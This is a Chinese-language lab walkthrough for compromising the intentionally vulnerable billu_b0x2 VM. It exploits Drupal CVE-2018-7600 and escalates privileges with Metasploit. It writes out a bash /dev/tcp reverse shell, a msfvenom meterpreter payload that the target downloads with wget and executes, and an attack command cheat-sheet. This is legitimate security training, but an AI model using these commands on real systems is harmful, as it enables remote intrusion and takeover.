简单打靶场之billu_b0x2
字数 973 2025-08-12 11:34:27
Billu_b0x2 靶场渗透测试教学文档
0x01 靶场环境搭建
-
虚拟机准备:
- 使用VMware打开
billu_b0x.ova文件 - 如遇弹窗提示,选择"重试"
- 网络模式选择:
- 如果路由器无需二次认证:选择桥接模式
- 如需二次认证:选择NAT模式(推荐)
- 使用VMware打开
-
启动虚拟机:
- 点击"开启此虚拟机"启动靶机
0x02 信息收集阶段
主机发现
# 使用Metasploit的ARP扫描模块
use auxiliary/scanner/discovery/arp_sweep
info # 查看模块信息
show options # 显示配置选项
set RHOSTS 192.168.91.0/24 # 设置扫描范围
set THREADS 30 # 设置线程数
run # 执行扫描
端口扫描
nmap -T4 -sC -sV -p- 192.168.91.150
开放端口:
- 22 (SSH)
- 80 (HTTP)
- 111 (RPC)
- 8080 (HTTP代理)
- 33371 (未知服务)
0x03 漏洞利用
Drupal CVE-2018-7600 RCE漏洞利用
-
漏洞确认:
- 使用自动化工具(Goby/fscan)扫描确认漏洞存在
-
手动利用步骤:
- 将POC代理到Burp Suite中
- 修改执行命令部分
-
反弹Shell尝试:
# 攻击机监听
nc -nlvp 6666
# 尝试URL编码后执行反弹Shell
echo "bash -i >& /dev/tcp/192.168.91.139/6666 0>&1" | bash
注:如不成功,采用备用方案
备用利用方案:MSF后门
- 生成Payload:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.91.139 LPORT=4444 -f elf > shell.elf
- 搭建HTTP服务:
python3 -m http.server
- MSF监听设置:
msfconsole
use exploit/multi/handler
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.91.139
set LPORT 4444
run
- 靶机执行:
wget http://攻击机IP:8000/shell.elf
chmod 777 shell.elf
./shell.elf &
0x04 权限提升
- 漏洞探测:
run post/multi/recon/local_exploit_suggester
- 利用blueman提权漏洞:
use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc
set session 1
set PAYLOAD linux/x86/meterpreter/reverse_tcp # 必须与之前一致
exploit
关键点:Payload类型必须与初始会话建立时使用的保持一致,否则无法成功提权。
0x05 总结与经验
-
工具选择:
- 自动化工具(Goby/fscan)可快速识别漏洞
- Metasploit提供稳定可靠的利用链
-
常见问题解决:
- 反弹Shell失败时考虑替代方案
- 提权失败时检查Payload一致性
-
学习要点:
- 信息收集的全面性
- 多种利用方式的掌握
- 提权时的细节注意
附录:常用命令速查
| 功能 | 命令 |
|---|---|
| ARP扫描 | use auxiliary/scanner/discovery/arp_sweep |
| 端口扫描 | nmap -T4 -sC -sV -p- [IP] |
| 生成Payload | msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf |
| HTTP服务 | python3 -m http.server |
| 漏洞探测 | run post/multi/recon/local_exploit_suggester |